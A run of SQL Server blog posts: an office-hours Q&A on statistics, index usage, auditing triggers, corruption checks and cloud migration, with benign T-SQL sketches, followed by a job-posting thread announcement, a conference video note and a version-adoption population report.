Steph: Hello Brent, is there a reason why SQL Server doesn’t seem to have shortcuts to compute stats on columns with unique constraint ? Why scan all rows when the density is always 1/count(*) and histograms seem useless ? This confuses me. Thanks.

Because some queries will do range scans, as in, show me all IDs between 1000 and 2000. SQL Server needs to know how many IDs exist in that range – some IDs may have been deleted. The only way to find out is to read the data.
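
In other words, even a guaranteed-unique column needs a histogram for range queries like this sketch against the Stack Overflow Users table:

/* Even though Id is unique, the optimizer still needs the statistics
   histogram to estimate this range – deletes mean the row count isn't
   simply (2000 - 1000 + 1). */
SELECT Id, DisplayName
FROM   dbo.Users
WHERE  Id BETWEEN 1000 AND 2000;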

Darin Webber: Hello Brent!! I need to change a datatype of 2 columns on a very large table.What would be the best approach for his operation? Creating 2 new columns and copying the data and then dropping the old ones, or there is another better approach? Will dropping the columns cause downtime?

Read this.

Tayyip: Is there an ideal index usage stats age band for when it’s safe to make decisions re: dropping rarely used NC indexes?

For me, if an index hasn’t been used in 32 days, it needs to go.
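
If you go down that road, remember the usage DMV resets when the server restarts, so make sure you've actually been collecting for that long. A hedged sketch of the sanity check:

/* A hedged sketch: check how long usage data has been accumulating,
   then look at per-index usage for nonclustered indexes. */
SELECT sqlserver_start_time
FROM   sys.dm_os_sys_info;

SELECT OBJECT_NAME(i.object_id) AS table_name,
       i.name                   AS index_name,
       us.user_seeks, us.user_scans, us.user_lookups,
       us.last_user_seek, us.last_user_scan
FROM   sys.indexes AS i
LEFT JOIN sys.dm_db_index_usage_stats AS us
       ON  us.object_id   = i.object_id
       AND us.index_id    = i.index_id
       AND us.database_id = DB_ID()
WHERE  i.type_desc = 'NONCLUSTERED';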

Don’t Blame Anthony: What is your opinion of using Pure FlashBlade to speed up SQL backups and restores?

I haven’t used it myself.

Daniel: Can you please please break down steps and the process of consuming data from an API (JSON format) using SSIS and then uploading that consumed data into a SQL Server database? Thanks!

I don’t use SSIS.

Bad DBA Taylor: We built a devops repo to deploy SQL permissions for service accounts, but due to the high volume (15k/batches/s) the release pipeline gets deadlocked on a very simple CREATE USER statement causes a massive SCH_M lock chain. Our security cache is 12gb. Could this be the problem?

If you think it is, try to flush that cache first as part of your deployment scripts. (I have a feeling it isn’t, though.)
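
If you do want to test that theory, there's a documented way to clear just the security token cache rather than the whole plan cache – a hedged sketch, and something to test well outside production first:

/* Clears only the security token cache (TokenAndPermUserStore),
   not the plan cache. Test carefully before scripting this into
   a deployment pipeline. */
DBCC FREESYSTEMCACHE ('TokenAndPermUserStore');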

RoJo: I want to add AG offsite. Can I use 2016 on-site and 2017 or 2019 offsite?

I would not do that, no. Failover would be one-way – you couldn’t fail back.

TeeJay: We recently had to do an unplanned over-the-top SQL upgrade from 2014 to 2017 in our prod environment (yes, bad, I know). I now have a bunch of fires to put out. Are there any obvious first places to look for new performance problems (like the cardinality estimator was for 2014)?

Indeed there are! Check out my Mastering Server Tuning class.

Tayyip: What are the pros/cons of working as the sole SQL DBA vs working on a team of SQL DBA’s?

You can learn more, more quickly, by working with others. You also have to put up with them.

Alex: Hi Brent, You look like someone that is in pretty good shape. How do you balance your Work, Health & Mind in what can be a sedentary job. Especially because of Covid alot of people are not having to go into the office any more?

Read this.

Seshat: What are your thoughts on using SQL startup option -E for index rebuild / read ahead performance across multiple data files?

Never heard of it.

Sekhmet: What is your experience / opinion of using NVDIMM / PMEM as a high speed storage for SQL Server?

It’s dying.

Don’t Blame Anthony: How do you deal with undetected write errors in SQL server?

Detect them by running DBCC CHECKDB as frequently as practical – even overnight if your business windows allow it.
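
A minimal sketch of the core command behind most corruption-check jobs (maintenance solutions like Ola Hallengren's wrap the same thing with scheduling and logging):

/* NO_INFOMSGS keeps the output readable; ALL_ERRORMSGS reports every
   error per object instead of just the first few. */
DBCC CHECKDB (N'StackOverflow2013') WITH NO_INFOMSGS, ALL_ERRORMSGS;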

Anatoli: What interesting tools do you know of (besides SSMS / Sentry Plan Explorer) that will parse SQL query plans?

Quest Spotlight Tuning Pack is another one.

DBAInProgress: Hello Brent. What different screencast softwares have you used to overlay yourself onto your screen with audio?

Read this.

Piotr: What are your favorite DMV’s in Azure SQL DB?

I don’t have a separate set there – I try to use common ground between both Azure and SQL Server.

Fyodor: Do you have any guidelines for maximum number of columns to allow for the include columns in a NC index?

Yes, and we discuss them in my Mastering Index Tuning class.

Mahesh: When Sql is migrated to cloud will there be a change to RTO and RPO .

Yes.

DanishDBA: Hi Brent. My friend is going to implement logging requirements from customers. They want to see who changed a column value, date and old/new value. Is System-versioned Temporal Tables the recommended solution when performance is the main concern? What are your thoughts on this?

If performance is the main concern, only log the specific columns you care about. For example, you probably wouldn’t want to monitor high-velocity columns like QuantityInStock. When you only care about specific columns and specific sources, triggers are likely to be faster, and generate less transaction log activity.
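
For example, here's a hedged sketch of the trigger approach on a single column – the table and column names are made up:

/* A hedged sketch with made-up names: log only the one column the
   business cares about, and only when it actually changes. */
CREATE TRIGGER dbo.trg_Customers_AuditCreditLimit
ON dbo.Customers
AFTER UPDATE
AS
BEGIN
    SET NOCOUNT ON;
    IF UPDATE(CreditLimit)
        INSERT dbo.CustomerAudit (CustomerId, OldCreditLimit, NewCreditLimit, ChangedAt, ChangedBy)
        SELECT d.CustomerId, d.CreditLimit, i.CreditLimit, SYSUTCDATETIME(), SUSER_SNAME()
        FROM   deleted  AS d
        JOIN   inserted AS i ON i.CustomerId = d.CustomerId
        WHERE  ISNULL(d.CreditLimit, 0) <> ISNULL(i.CreditLimit, 0);
END;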

Skrillex: How do you verify that it’s safe to upgrade DB compat mode to latest version? 2014 to 2019 in this case.

Read this.

Urquan: What percent of your clients license SQL by the server / core vs Microsoft Assurance?

Of course I have a straight face under here, why do you ask?

I don’t track that. I don’t sell licensing. I don’t even ask clients how they’re licensing it.

Guðmundur: For query perf testing, can you hint DB compat level at the query level vs changing for entire DB?

Read this.

Piotr: What is your opinion of external tables in Azure SQL DB? Do they perform any better than linked servers in on-prem SQL Server?

Never used ’em.

Elijah: Are there workflow orchestrators that you recommend as an alternative for SSIS? SSIS seems to have pain-points around metadata getting out of date, difficulty to review as code, and being difficult to debug for large workflows. However, nothing else seems to work with SQL Agent.

I don’t work with SSIS, so I’d post that on #SQLHelp.

Anatoli: What are the ideal display columns / column order when running sp_whoisactive to triage a server performance fire?

The defaults. Learn to use the defaults so that when you parachute into a server you’ve never seen before, you can work quickly.

Chenjesu: Do you see any interesting SQL alerting mechanisms at your clients other than email?

No.

Bryan Flores: Hello Brend, do you recommend sql server replication in 2019 or 2022, but do you recommend instead of replication

Come on, Ryan, that’s like asking if I recommend hammers. What’s the problem you’re trying to solve? Don’t ask if you should use a tool – describe the problem you’re facing, and then we can pick the right tool, Mr. Flowers.

Yehat: How do SQL DB snapshots compare with SAN snapshots as a potential rollback mechanism for a failed application deployment / update?

Most of the clients I work with have some kind of high availability and disaster recovery mechanism like log shipping, AGs, or SAN replication. You can’t roll back a database snapshot without affecting everything downstream. SAN snapshots have similar problems, but if you’re also using SAN replication for DR, the syncing back & forth is way easier.

The Swedish Chef: How do you project costs for hypothetical Azure SQL Managed instance against hypothetical SQL in Azure VM? Need to figure out who wins a bakeoff and migrate from on-prem.

Start by exactly quantifying your per-server costs to build, manage, and troubleshoot Always On Availability Groups for a single cluster. If you can’t do that, a true cost comparison is hopeless. (Hint: it’s hopeless.)

Anatoli: What is your opinion of the TSQL MERGE statement? Do you have any performance tips when using it?

Read this.

Sajawal: Please don’t say NO. How can we read an execution on Azure Synapse Analytics? Please help us in that world as well.

I’ve never used Synapse Analytics.

Yitzhak: Do SSMS live query stats ever get you over the performance finish line?

Yes, but read this.

Vilhelms: When do you like to use sp_blitzwho vs when do you like to use sp_whoisactive?

I answer that one in this module of my How I Use the First Responder Kit class.

Guðmundur: Which SQL locking model is easier for developers to understand and code? Optimistic or pessimistic locking?

Optimistic.

SQL_RAGE: How does referencing a column by an alias versus the column name influence SQL’s decision on which execution plan to use? Seeing SQL use a bad plan for a query using the aliased column column name in an ORDER BY, but uses a good plan when using the column alias.

Odds are, it’s unrelated to the alias, and related to optimization timeouts. I explain those in my Fundamentals of Query Tuning class.

Ramil: Hi Brent! App controls a lot of things like amount of database files-only one, indexes can be created only via app, partitioning is not allowed. How can I scale up horizontally in this case? because DB is growing 250gb per month. OLTP DB, currently 1.8 TB, in AlwaysOn AG.

I think you fundamentally misunderstand scaling terms. Scaling up vertically refers to adding hardware. Scaling out horizontally refers to adding more servers. In either case, this is pretty far beyond a free Office Hours question – feel free to click Consulting at the top of the screen before you make a multi-million-dollar licensing and hardware architecture plan.

Fyodor: Would you consider blogging a list of your top 10 most watched Ozar You Tube videos?

No, because people who aren’t smart enough to go to my YouTube channel, click Videos, and click Sort By aren’t smart enough to hold down database jobs anyway.


Who’s Hiring in the Database Community? September 2022 Edition

Who's Hiring
18 Comments

Is your company hiring for a database position as of September 2022? Do you wanna work with the kinds of people who read this blog? Let’s set up some rapid networking here. If your company is hiring, leave a comment.

The rules:

  • Your comment must include the job title, and either a link to the full job description, or the text of it. It doesn’t have to be a SQL Server DBA job, but it does have to be related to databases. (We get a pretty broad readership here – it can be any database.)
  • Include an email address for resumes, or a link to the application process. If I were you, I’d use an email address so you can tell which applicants are readers here – they may be more qualified than the applicants you regularly get.
  • Please state the location and include REMOTE and/or VISA when that sort of candidate is welcome. When remote work is not an option, include ONSITE.
  • Please only post if you personally are part of the hiring company—no recruiting firms or job boards. Only one post per company. If it isn’t a household name, please explain what your company does.
  • Commenters: please don’t reply to job posts to complain about something. It’s off topic here.
  • Readers: please only email if you are personally interested in the job.

If your comment isn’t relevant or smells fishy, I’ll delete it. If you have questions about why your comment got deleted, or how to maximize the effectiveness of your comment, contact me.

Each month, I publish a new post in the Who’s Hiring category here so y’all can get the latest opportunities.


[Video] Fragmentation Explained in 20 Minutes at SQLBits

Index Maintenance, Videos
23 Comments

What does fragmentation mean? How does it happen? Can you fix it with fill factor? Should you rebuild your indexes to fix it?

At the SQLBits conference, I tried a new way of explaining it using markers and pieces of whiteboard paper as database pages, and doing inserts live on the fly.

What you see onscreen is actually what the in-person audience saw up on the projector. Prior to the session, I rigged up a tripod and camera aimed down at the desk so the audience could watch me work.

I had so much fun with this session, and I’m so proud of the results. I want to thank SQLBits for recording the sessions and making them freely available on YouTube, and the sponsors for making it possible!


SQL ConstantCare® Population Report: Summer 2022

Ever wonder how fast people are adopting new versions of SQL Server, or what’s “normal” out there for SQL Server adoption rates, hardware sizes, or numbers of databases? Let’s find out in the summer 2022 version of our SQL ConstantCare® population report.

Out of the 3,151 servers sending in data recently, the most popular version of SQL Server is still 2016:

This will be the last version of the report where I’ll break out 2008, 2008 R2, and 2012 separately. Going forward, I’ll just lump ’em under “2012 & Prior” since they’ll add up to even less the next time I do the report.

Mainstream support is over for SQL Server 2014 & 2016, so here’s a number that makes me a little nervous: only 55% of servers are under mainstream support. When SQL Server 2017’s mainstream support ends in October 2022, that means only the 23% of users on SQL Server 2019, and the 13% in Azure SQL DB, will be getting regular updates. Yowza.

SQL Server 2016, 2017, and 2019 account for 69% of the user population, and Azure SQL DB took a big jump from about 1% up to about 11%.

Up in the cloud, Azure overall jumped dramatically from about 1% to about 13% of the population – 11% of that being Azure SQL DB itself, and Managed Instances at 2%.

The newer products are at the top of this chart, and the new data’s at the right, so you can see the new stuff gradually pushing down the old stuff over time:

While the most popular version is still SQL Server 2016, this year 2019 is getting a lot closer. Every single version’s going down except SQL Server 2019 and Azure SQL DB.

These numbers help to give me perspective when I think about new adoptions of SQL Server 2022. It’s possible that SQL Server 2022 will gain adoption faster than 2019 did because I don’t think there were a whole lot of “I absolutely gotta have that” features in 2019. With 2022’s Availability Groups being able to fail back & forth to the cloud, if that ships in a solid, reliable, easy-to-troubleshoot way, that could be the killer feature that really spurs 2022 adoption.